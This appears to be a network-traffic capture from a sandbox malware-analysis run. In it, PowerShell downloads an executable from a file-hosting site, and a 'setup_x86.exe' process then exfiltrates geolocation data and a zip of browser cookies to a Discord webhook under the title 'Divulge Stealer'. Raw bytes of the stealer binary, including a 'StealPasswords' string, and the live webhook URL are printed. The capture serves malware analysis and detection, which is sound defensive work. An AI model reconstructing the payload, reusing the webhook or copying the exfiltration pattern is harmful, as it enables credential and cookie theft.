Dec 23, 2024 06:41:29.687685013 CET	381	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 05:41:28 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	108.181.20.35	443	6872	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 05:41:06 UTC	171	OUT	GET /l2rczc.pif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: files.catbox.moe Connection: Keep-Alive
2024-12-23 05:41:07 UTC	551	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Dec 2024 05:41:06 GMT Content-Type: application/octet-stream Content-Length: 190464 Last-Modified: Sun, 01 Dec 2024 21:17:12 GMT Connection: close ETag: "674cd258-2e800" X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self'; Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD Accept-Ranges: bytes
2024-12-23 05:41:07 UTC	15833	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 04 9d 95 f5 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 de 02 00 00 08 00 00 00 00 00 00 5e fd 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0^ @ @`
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 00 00 04 11 1b 72 e3 08 00 70 28 a8 00 00 0a 28 1b 01 00 06 6f c0 00 00 0a 02 02 7b 86 00 00 04 02 7b 79 00 00 04 8e 69 58 7d 86 00 00 04 02 7b 7a 00 00 04 8e 2c 58 28 6f 00 00 06 2c 51 02 7b 4d 00 00 04 72 3f 06 00 70 72 af 08 00 70 28 bf 00 00 0a 13 1c 11 1c 28 ab 00 00 0a 26 07 02 7b 78 00 00 04 11 1c 72 09 09 00 70 28 a8 00 00 0a 28 1b 01 00 06 6f c0 00 00 0a 02 02 7b 86 00 00 04 02 7b 7a 00 00 04 8e 69 58 7d 86 00 00 04 02 7b 7b 00 00 04 8e 2c 58 28 6f 00 00 06 2c 51 02 7b 4d 00 00 04 72 3f 06 00 70 72 af 08 00 70 28 bf 00 00 0a 13 1d 11 1d 28 ab 00 00 0a 26 07 02 7b 7b 00 00 04 11 1d 72 33 09 00 70 28 a8 00 00 0a 28 1b 01 00 06 6f c0 00 00 0a 02 02 7b 86 00 00 04 02 7b 7b 00 00 04 8e 69 58 7d 86 00 00 04 02 7b 7c 00 00 04 8e 2c 58 28 6f 00 00 06 2c Data Ascii: rp((o{{yiX}{z,X(o,Q{Mr?prp((&{xrp((o{{ziX}{{,X(o,Q{Mr?prp((&{{r3p((o{{{iX}{\|,X(o,
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 00 00 11 73 d2 00 00 0a 0a 06 6f d3 00 00 0a 72 0f 20 00 70 6f d4 00 00 0a 06 6f d3 00 00 0a 72 1f 20 00 70 28 a9 01 00 0a 6f 69 01 00 0a 72 65 20 00 70 28 0c 01 00 0a 6f d5 00 00 0a 06 6f d3 00 00 0a 16 6f d7 00 00 0a 06 6f d3 00 00 0a 17 6f d6 00 00 0a 06 6f d9 00 00 0a 26 de 0a 06 2c 06 06 6f 23 00 00 0a dc 16 28 a1 00 00 0a 2a 01 10 00 00 02 00 06 00 55 5b 00 0a 00 00 00 00 1b 30 04 00 6c 00 00 00 4a 00 00 11 73 d2 00 00 0a 0a 06 6f d3 00 00 0a 72 7b 20 00 70 6f d4 00 00 0a 06 6f d3 00 00 0a 72 91 20 00 70 28 a9 01 00 0a 6f 69 01 00 0a 72 29 00 00 70 28 0c 01 00 0a 6f d5 00 00 0a 06 6f d3 00 00 0a 17 6f d6 00 00 0a 06 6f d3 00 00 0a 16 6f d7 00 00 0a 06 6f d9 00 00 0a 26 06 6f da 00 00 0a de 0a 06 2c 06 06 6f 23 00 00 0a dc 2a 01 10 00 00 02 00 06 00 Data Ascii: sor poor p(oire p(oooooo&,o#(U[0lJsor{ poor p(oir)p(oooooo&o,o#
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 27 00 70 7e 48 01 00 04 72 f1 27 00 70 72 b3 26 00 70 28 bf 00 00 0a 6f 21 02 00 0a 25 72 1b 28 00 70 7e 48 01 00 04 72 39 28 00 70 72 4d 28 00 70 72 b3 26 00 70 28 22 02 00 0a 6f 21 02 00 0a 25 72 57 28 00 70 7e 48 01 00 04 72 61 28 00 70 72 57 28 00 70 72 b3 26 00 70 28 22 02 00 0a 6f 21 02 00 0a 25 72 75 28 00 70 7e 48 01 00 04 72 75 28 00 70 72 83 28 00 70 72 b3 26 00 70 28 22 02 00 0a 6f 21 02 00 0a 25 72 9f 28 00 70 7e 48 01 00 04 72 ab 28 00 70 72 c7 28 00 70 72 b3 26 00 70 28 22 02 00 0a 6f 21 02 00 0a 25 72 e3 28 00 70 7e 48 01 00 04 72 e3 28 00 70 72 b3 26 00 70 28 bf 00 00 0a 6f 21 02 00 0a 6f 23 02 00 0a 0c 2b 61 12 02 28 24 02 00 0a 0d 12 03 28 25 02 00 0a 28 a9 00 00 0a 2c 4b 12 03 28 26 02 00 0a 72 a7 27 00 70 28 15 00 00 0a 2c 14 07 12 03 Data Ascii: 'p~Hr'pr&p(o!%r(p~Hr9(prM(pr&p("o!%rW(p~Hra(prW(pr&p("o!%ru(p~Hru(pr(pr&p("o!%r(p~Hr(pr(pr&p("o!%r(p~Hr(pr&p(o!o#+a($(%(,K(&r'p(,
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 2a 00 00 1b 30 04 00 6d 03 00 00 74 00 00 11 02 7b 83 02 00 04 0a 06 45 03 00 00 00 50 00 00 00 d5 00 00 00 1e 01 00 00 02 73 58 02 00 0a 7d 85 02 00 04 7e 62 02 00 04 28 a9 00 00 0a 0c 08 2c 5e 28 e0 01 00 06 6f 48 02 00 0a 0d 12 03 28 49 02 00 0a 2d 3f 02 16 25 0a 7d 83 02 00 04 02 09 7d 86 02 00 04 02 7c 84 02 00 04 12 03 02 28 8c 00 00 2b dd 03 03 00 00 02 7b 86 02 00 04 0d 02 7c 86 02 00 04 fe 15 89 00 00 1b 02 15 25 0a 7d 83 02 00 04 12 03 28 4b 02 00 0a 14 fe 03 0c 08 39 8d 02 00 00 7e 65 02 00 04 25 2d 17 26 7e 64 02 00 04 fe 06 e6 01 00 06 73 02 02 00 0a 25 80 65 02 00 04 28 49 00 00 2b 6f fa 01 00 0a 13 05 12 05 28 fb 01 00 0a 2d 41 02 17 25 0a 7d 83 02 00 04 02 11 05 7d 87 02 00 04 02 7c 84 02 00 04 12 05 02 28 8d 00 00 2b dd 7e 02 00 00 02 7b Data Ascii: *0mt{EPsX}~b(,^(oH(I-?%}}\|(+{\|%}(K9~e%-&~ds%e(I+o(-A%}}\|(+~{
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 00 04 38 31 02 00 00 02 7b 5d 03 00 04 02 7b 5e 03 00 04 9a 13 06 00 06 18 3b 31 01 00 00 02 28 a7 00 00 0a 1f 0f 28 10 01 00 06 28 a8 00 00 0a 7d 5f 03 00 04 02 7b 5f 03 00 04 28 83 00 00 0a 2d dc 11 06 02 7b 5f 03 00 04 28 84 01 00 0a 02 02 7b 5f 03 00 04 73 4d 01 00 06 7d 60 03 00 04 02 7b 60 03 00 04 72 73 2c 00 70 6f 57 01 00 06 2d 05 dd b3 01 00 00 02 16 7d 61 03 00 04 38 6f 01 00 00 02 02 7b 60 03 00 04 02 7b 61 03 00 04 72 83 2c 00 70 6f 53 01 00 06 7d 62 03 00 04 02 02 7b 60 03 00 04 02 7b 61 03 00 04 72 95 2c 00 70 6f 53 01 00 06 7d 63 03 00 04 02 02 7b 60 03 00 04 02 7b 61 03 00 04 72 9f 2c 00 70 6f 53 01 00 06 7d 64 03 00 04 28 bb 01 00 0a 02 7b 60 03 00 04 02 7b 61 03 00 04 72 a9 2c 00 70 6f 53 01 00 06 6f 51 02 00 0a 02 02 7b 60 03 00 04 02 Data Ascii: 81{]{^;1(((}_{_(-{_({_sM}`{`rs,poW-}a8o{`{ar,poS}b{`{ar,poS}c{`{ar,poS}d({`{ar,poSoQ{`
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 1b 02 15 25 0a 7d 20 04 00 04 12 03 28 4b 02 00 0a 13 07 02 7b 2a 04 00 04 28 a0 00 00 0a 2d 3e 02 7b 2b 04 00 04 28 a0 00 00 0a 2d 31 11 07 2c 2d 11 07 8e 2c 28 02 7b 22 04 00 04 02 7b 2b 04 00 04 28 cc 00 00 0a 11 07 6f cd 00 00 0a 02 7b 2a 04 00 04 73 12 02 00 06 6f 5a 02 00 0a 02 14 7d 2a 04 00 04 02 14 7d 2b 04 00 04 02 7b 29 04 00 04 13 08 02 11 08 17 58 7d 29 04 00 04 02 7b 29 04 00 04 02 7b 28 04 00 04 6f 50 01 00 06 3f cb fe ff ff 02 7b 27 04 00 04 28 c6 00 00 0a 02 14 7d 27 04 00 04 02 14 7d 28 04 00 04 de 07 28 95 00 00 0a de 00 02 02 7b 26 04 00 04 17 58 7d 26 04 00 04 02 7b 26 04 00 04 02 7b 25 04 00 04 8e 69 3f 0c fe ff ff 02 14 7d 25 04 00 04 02 7b 22 04 00 04 6f 5b 02 00 0a 0b de 20 13 09 02 1f fe 7d 20 04 00 04 02 14 7d 22 04 00 04 02 7c Data Ascii: %} (K{(->{+(-1,-,({"{+(o{soZ}*}+{)X}){){(oP?{'(}'}(({&X}&{&{%i?}%{"o[ } }"\|
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 00 e9 77 00 00 00 00 86 08 41 24 d0 0d 73 00 f2 77 00 00 00 00 86 08 97 34 da 00 74 00 fa 77 00 00 00 00 86 08 a0 34 7c 00 74 00 03 78 00 00 00 00 86 08 79 24 da 00 75 00 0b 78 00 00 00 00 86 08 81 24 7c 00 75 00 14 78 00 00 00 00 83 18 f4 2b ed 0d 76 00 24 78 00 00 00 00 83 00 89 16 51 08 77 00 68 78 00 00 00 00 e1 01 77 34 f7 00 77 00 10 7c 00 00 00 00 e1 01 91 1b e1 08 77 00 20 7c 00 00 00 00 93 00 fe 33 0f 0f 78 00 6c 7c 00 00 00 00 e1 01 77 34 f7 00 7a 00 70 7f 00 00 00 00 e1 01 91 1b e1 08 7a 00 7e 7f 00 00 00 00 96 00 e2 3b 0d 05 7b 00 81 7f 00 00 00 00 96 00 6f 47 21 10 7c 00 a8 7f 00 00 00 00 96 00 3a 3a 0d 05 7e 00 24 80 00 00 00 00 96 00 bb 46 50 10 7f 00 4a 80 00 00 00 00 96 00 7e 4a 5a 10 81 00 52 80 00 00 00 00 96 00 bb 4a 62 10 82 00 60 80 Data Ascii: wA$sw4tw4\|txy$ux$\|ux+v$xQwhxw4w\|w \|3xl\|w4zpz~;{oG!\|::~$FPJ~JZRJb`
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 03 ac 1c 40 2f cb 03 40 1d 60 2f cb 03 b4 1d 80 2f cb 03 0f 1e 80 31 d3 04 1b 00 c0 31 d3 04 1b 00 00 32 d3 04 1b 00 40 32 d3 04 1b 00 80 32 d3 04 1b 00 c0 32 d3 04 1b 00 00 33 d3 04 1b 00 40 33 d3 04 1b 00 80 33 cb 03 f2 22 a0 33 cb 03 49 23 20 35 d3 04 1b 00 60 35 d3 04 1b 00 a0 35 cb 03 0b 25 c0 35 cb 03 66 25 e0 35 cb 03 c6 25 00 36 cb 03 27 26 84 36 93 09 1b 00 c0 36 d3 04 1b 00 00 37 d3 04 1b 00 40 37 d3 04 1b 00 80 37 d3 04 1b 00 c0 37 cb 03 a1 27 e0 37 cb 03 f4 27 00 38 cb 03 42 28 20 38 cb 03 91 28 e0 38 d3 04 1b 00 20 39 d3 04 1b 00 60 39 d3 04 1b 00 a0 39 d3 04 1b 00 e0 39 cb 03 30 29 00 3a cb 03 85 29 20 3a cb 03 d5 29 40 3a cb 03 26 2a 00 3b d3 04 1b 00 40 3b d3 04 1b 00 80 3b d3 04 1b 00 c0 3b d3 04 1b 00 00 3c cb 03 c7 2a 20 3c cb 03 1a 2b Data Ascii: @/@`//112@2223@33"3I# 5`55%5f%5%6'&667@777'7'8B( 8(8 9`9990):) :)@:&;@;;;< <+
2024-12-23 05:41:07 UTC	16384	IN	Data Raw: 72 61 74 6f 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 62 6c 65 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 4d 6f 6e 69 74 6f 72 00 49 6e 74 50 74 72 00 54 79 70 65 41 73 00 47 72 61 70 68 69 63 73 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 67 65 74 5f 65 6d 62 65 64 73 00 73 65 74 5f 65 6d 62 65 64 73 00 47 65 74 46 69 65 6c 64 73 00 46 72 6f 6d 53 65 63 6f 6e 64 73 00 67 65 74 5f 42 6f 75 6e 64 73 00 67 65 74 5f 53 74 65 61 6c 50 61 73 73 77 6f 72 64 73 00 73 65 74 5f 53 74 65 61 6c 50 61 73 73 77 6f 72 64 73 00 47 65 74 50 61 73 73 77 6f 72 64 73 00 70 61 73 73 77 6f 72 64 73 00 47 65 74 49 6e 74 65 72 66 61 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 Data Ascii: ratorSystem.Collections.IEnumerable.GetEnumerator.ctor.cctorMonitorIntPtrTypeAsGraphicsSystem.Diagnosticsget_embedsset_embedsGetFieldsFromSecondsget_Boundsget_StealPasswordsset_StealPasswordsGetPasswordspasswordsGetInterfacesSystem.Runt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49840	162.159.138.232	443	1220	C:\Users\user\Downloads\setup_x86.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 05:42:07 UTC	360	OUT	POST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1 Accept: application/json User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 Content-Type: application/json; charset=utf-8 Host: discord.com Content-Length: 885 Expect: 100-continue Connection: Keep-Alive
2024-12-23 05:42:07 UTC	885	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 44 69 76 75 6c 67 65 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f f0 9f 93 a1 4e 65 74 77 6f 72 6b 20 61 64 64 72 65 73 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5f 5f 2a 2a 5c 6e 60 60 60 70 72 6f 6c 6f 67 5c 6e 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 5c 6e 5c 6e 43 6f 75 6e 74 72 79 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 5c 6e 52 65 67 69 6f 6e 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 54 69 6d 65 7a 6f 6e 65 3a 20 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 5c 6e 5c 6e 43 65 6c 6c 75 6c 61 72 20 44 61 74 61 3a 20 e2 9d 8e 5c 6e 50 72 6f 78 79 2f 56 50 4e 3a 20 20 20 20 20 e2 9d 8e 5c 6e 5c 6e 60 60 60 Data Ascii: {"content":"","embeds":[{"title":"Divulge Stealer","description":"__Network address information__\n```prolog\nIP: 8.46.123.189\n\nCountry: United States\nRegion: New York\nTimezone: America/New_York\n\nCellular Data: \nProxy/VPN: \n\n```
2024-12-23 05:42:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-23 05:42:08 UTC	1308	IN	HTTP/1.1 404 Not Found Date: Mon, 23 Dec 2024 05:42:08 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734932529 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2MJt5yw33gp99HXq0sNJkjx6pt0POCB%2FV%2F0dSC%2BJu3F%2BWGIU%2Bhg6Np8BJXhpBOZWthRtdYk9lgQpffH1AVe81pZ6p67OGz5R7UsSj8%2BkHBJxFSNsq2NkpV5%2F4C22"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=8968e1cf982334ba284b7e504864cc8a1af43008-1734932528; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=wfgyQ2eOyERPUEGWvq7Yo8jHtzag6NH_ATxTUYFsPB8-1734932528107-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f6606caaab87cf0-EWR {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49846	162.159.138.232	443	1220	C:\Users\user\Downloads\setup_x86.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 05:42:09 UTC	531	OUT	POST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1 Accept: application/json User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 Content-Type: multipart/form-data; boundary="41694599-3b5c-4381-808c-f79709904d2e" Host: discord.com Cookie: __cfruid=8968e1cf982334ba284b7e504864cc8a1af43008-1734932528; _cfuvid=wfgyQ2eOyERPUEGWvq7Yo8jHtzag6NH_ATxTUYFsPB8-1734932528107-0.0.1.1-604800000 Content-Length: 659778 Expect: 100-continue
2024-12-23 05:42:09 UTC	40	OUT	Data Raw: 2d 2d 34 31 36 39 34 35 39 39 2d 33 62 35 63 2d 34 33 38 31 2d 38 30 38 63 2d 66 37 39 37 30 39 39 30 34 64 32 65 0d 0a Data Ascii: --41694599-3b5c-4381-808c-f79709904d2e
2024-12-23 05:42:09 UTC	142	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 44 69 76 75 6c 67 65 2d 37 32 31 36 38 30 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 44 69 76 75 6c 67 65 2d 37 32 31 36 38 30 2e 7a 69 70 0d 0a 0d 0a Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Divulge-721680.zip; filename*=utf-8''Divulge-721680.zip
2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 08 08 00 2d 05 97 59 82 d6 51 b9 ef 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 2f 43 6f 6f 6b 69 65 73 2f 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cf cd 72 43 40 00 00 e0 f3 66 26 8f 42 77 d9 5d 1c 7a 20 11 3f 15 31 cb 96 b8 18 44 08 51 21 53 e9 be 7d fb 04 fd de e0 93 db 69 6a ef 8d 5c 4f 23 48 18 b7 c1 1b 38 98 41 6c 03 a4 aa 84 6a 1a a2 50 51 0d 85 62 1d 84 de 1e 10 84 de b9 d5 84 bb 21 57 03 5d 64 f5 8f 3e 77 d8 3f f0 6c 78 0d e1 ce f0 96 cb 8d 5d aa 3e 4e fa 39 be 1d 3a 3d 5d 58 5d 7d 2c c5 72 f2 ab d6 3d d3 c4 c4 2c 91 e8 e3 09 ab ae 19 af af 5d 64 3d 83 63 1b 25 9a d4 26 75 3a bb 6b be e6 55 79 3d 3d 86 99 09 78 09 c4 d9 31 cc 3e 52 d6 8a 5b d3 58 2e 5f b5 f1 a8 f3 cf 7b e7 0e bc e1 65 7a fc 5e f6 Data Ascii: PK-YQ!#Browsers/Cookies/Chrome Cookies.txt}rC@f&Bw]z ?1DQ!S}ij\O#H8AljPQb!W]d>w?lx]>N9:=]X]},r=,]d=c%&u:kUy==x1>R[X._{ez^
2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: f1 61 06 53 b5 29 e1 25 54 a7 05 82 34 16 a1 df ab 3d 3f 98 f8 4f 23 13 67 1d 87 a0 f9 25 b1 bc 28 76 bd ed bf 7c 33 03 99 4a f2 fd cc 37 a2 2f 24 86 e7 28 80 a5 93 f4 8a f3 dd 39 73 5f c5 dc 1b b0 08 9e 33 62 9a 7b a5 78 f4 97 e2 21 ae 90 0b b9 3d f1 a1 63 aa 7d 95 72 d1 b6 b6 51 64 28 cc 9e 2c ea dc 61 2f 43 b7 c7 43 b2 c6 17 f6 1d 7b c1 96 93 8e 9d 1e a3 9c a8 63 df d6 2d e7 28 3b 52 cc bb 33 10 d0 58 e7 d9 d8 46 90 02 80 1e a3 1a b7 31 53 c8 b4 0b db af 01 fc e9 9c 41 f9 b1 c6 2e 37 64 ec df b9 19 ba ea e8 2f 24 bf 73 f5 eb 6b 20 37 f9 df ef 9d fc 2f e9 9e 4a b2 c3 e1 bf 08 ec 55 08 0c 4a cd 3c 4c e0 56 a2 5b b3 01 dd 61 ff 53 2c 6f f8 86 34 7b 5b d3 cc e9 30 4e 9d 92 24 dd 69 b9 54 ad c6 35 ba 9d 5e d9 52 9e ac e8 fa 4b 5f 0d 1b fc ce c3 d6 44 ad 45 Data Ascii: aS)%T4=?O#g%(v\|3J7/$(9s_3b{x!=c}rQd(,a/CC{c-(;R3XF1SA.7d/$sk 7/JUJ<LV[aS,o4{[0N$iT5^RK_DE
2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: ae d0 2b 8c ad 14 45 09 3e 55 1d fc 27 d6 d3 d4 35 82 6b 2b aa 75 99 7f 71 02 ca 69 37 f7 28 5e 0c 35 67 f5 5d 23 5d 99 1c e5 15 f6 34 2c 27 71 c1 a3 53 cc e8 cc a8 2f cf 5a 9c 78 21 ba 0d 88 0d 11 c0 cc 87 61 75 79 d1 7a 27 b6 e2 85 63 15 68 e6 e7 89 99 c1 81 74 79 4a 76 44 09 e4 37 e4 d7 a2 98 2f 33 8b 8f 90 f4 07 f5 bb af b1 e5 06 a0 cb 37 20 26 cc 46 86 73 ad d4 1a 52 c4 46 98 0b 65 9a d2 56 af b9 d1 d2 be 7e f1 a0 c7 74 e9 49 d4 aa 20 66 7b 24 a8 15 37 b1 73 b8 2d 9e 62 56 a6 7e 62 6e 7d 49 0f 70 a6 f5 52 2e 4d a1 63 68 d4 e1 6b 7f c1 fa 07 52 e0 db 97 cc 03 89 bf 32 42 38 5b 43 c6 cb 81 fe e9 13 6b b5 20 f7 a9 3b 8c 2a d7 59 2b 0b 8c 76 0b 8b 08 e9 d1 2f 18 00 3e f3 34 15 0b e9 ff 3f 52 23 87 7e 05 43 15 30 ca aa 30 f3 f7 52 00 ca 12 f1 f0 dd d7 ff Data Ascii: +E>U'5k+uqi7(^5g]#]4,'qS/Zx!auyz'chtyJvD7/37 &FsRFeV~tI f{$7s-bV~bn}IpR.MchkR2B8[Ck ;*Y+v/>4?R#~C00R
2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: aa d2 33 a3 eb 39 8a 3c f8 25 c7 f8 2e dd 9c eb c9 d5 29 3e ff 28 b1 b9 49 e0 77 5f 13 3e 93 78 78 d2 5f 64 c4 61 6b 22 32 08 60 af 77 d1 65 e2 45 b4 40 82 dc ae 60 c4 e2 81 4f 7b bb e8 6d 40 9d 05 69 fb a8 31 da 31 ae e5 d4 92 8c 43 a4 e4 17 7c 3b 9f 61 69 81 6b 44 10 45 f3 d6 d8 f2 f7 eb 22 51 11 33 d6 94 3e d6 59 77 f1 4f 91 77 d2 7a 38 5b 82 1a 7b c9 9c b6 b8 2d a9 e7 b5 84 5d 87 da d2 dd e2 47 0b 77 7d 09 3f 3d 07 bb a5 75 86 0b 95 30 9f 4c 84 46 2c 5d 56 2d 67 eb 8b 79 3e 9d e5 33 5e 94 da f9 2c f2 04 5c e8 85 2a 7c e9 3d b3 2c 16 d9 9d a2 b0 91 10 ce 99 9b ab 87 d1 b4 78 dc 8a 7d 6d 2d bf 27 df 8f 7c 08 3c d7 0f 56 42 04 28 42 5c 1c de 3a d0 53 22 0a 65 7d c8 fa 2a 37 82 65 6b b8 9d ca ba 4d 67 d5 f6 13 46 be 8c f1 75 a8 92 2b 34 bd 0b d2 21 48 80 Data Ascii: 39<%.)>(Iw_>xx_dak"2`weE@`O{m@i11C\|;aikDE"Q3>YwOwz8[{-]Gw}?=u0LF,]V-gy>3^,\\|=,x}m-'\|<VB(B\:S"e}7ekMgFu+4!H
2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: 30 a6 08 51 74 d2 ae cd b4 22 2f c7 ad 95 39 84 dd 7b 25 d2 0f 77 d7 ab 11 4f ce 84 22 af b5 ab 5a cd 2f 8a ec 0f f3 56 8f 57 56 72 94 7e d2 53 8e 01 42 c1 6c 69 e6 d2 7b fa 28 98 86 f1 be 10 7b 3c 0e 03 6a db de fa b0 c7 e0 98 99 14 64 0c 93 da d9 7f d4 d0 20 28 0d 06 09 e9 8d 96 fd 0e aa 3f 7d 69 0d c9 3f 69 36 f3 23 d6 2c 20 9b 26 d2 d8 0a 53 1f 80 65 cb 66 db bb 4c f7 68 c7 3b db 12 aa 6a 3e 31 37 5c 65 84 a9 ce 71 06 14 7b cb 0e 44 b8 2c 8a 9c 66 f7 67 56 35 a2 b1 9b c0 a4 0e 1d 1a bf 89 73 8b 09 2b 86 5b 98 7c 12 ea c6 37 34 b3 b2 eb 4a d3 dd c7 4c 9a 81 01 3f fb 7c 3a d5 03 e5 f4 f6 60 d0 59 a6 27 da c3 fd 15 55 4d 81 63 40 7e e7 bd 6b e1 c9 66 28 7d 35 87 2c 39 47 01 49 e6 2d ae 08 c2 f4 ab 66 7a 9c 05 19 3f cf db e4 19 53 4b a1 33 d9 9f 71 b6 07 Data Ascii: 0Qt"/9{%wO"Z/VWVr~SBli{({<jd (?}i?i6#, &SefLh;j>17\eq{D,fgV5s+[\|74JL?\|:`Y'UMc@~kf(}5,9GI-fz?SK3q
